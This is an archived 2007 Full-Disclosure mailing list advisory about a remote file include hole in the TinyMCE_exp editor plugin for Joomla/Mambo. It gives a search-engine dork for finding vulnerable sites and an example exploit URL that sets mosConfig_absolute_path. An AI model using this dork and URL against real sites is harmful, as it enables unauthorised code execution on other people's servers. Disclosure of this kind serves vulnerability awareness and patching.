[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] TinyMCE_exp Remote File Include Vulnerability
- To: submit@xxxxxxxxxxx, bugtraq@xxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] TinyMCE_exp Remote File Include Vulnerability
- From: "0o_zeus_o0 elitemexico.org" <zeus.olimpusklan@xxxxxxxxx>
- Date: Sun, 11 Mar 2007 23:14:12 +0100
###########################################################################
TinyMCE_exp Remote File Include Vulnerability
Author: Arturo Z.
Contact: zeus@xxxxxxxxxxxxxxx
Website: www.diosdelared.com
Date: 10/03/07
Risk: critical
Vendor Url:
http://www.joomlaya.com/index.php?option=com_remository&func=fileinfo&filecatid=1868
Affected Software: TinyMCE_exp
search: allinurl: tiny_mce
example
##################################################################
http://site.com/path/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosConfig_absolute_path=
##################################################################
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/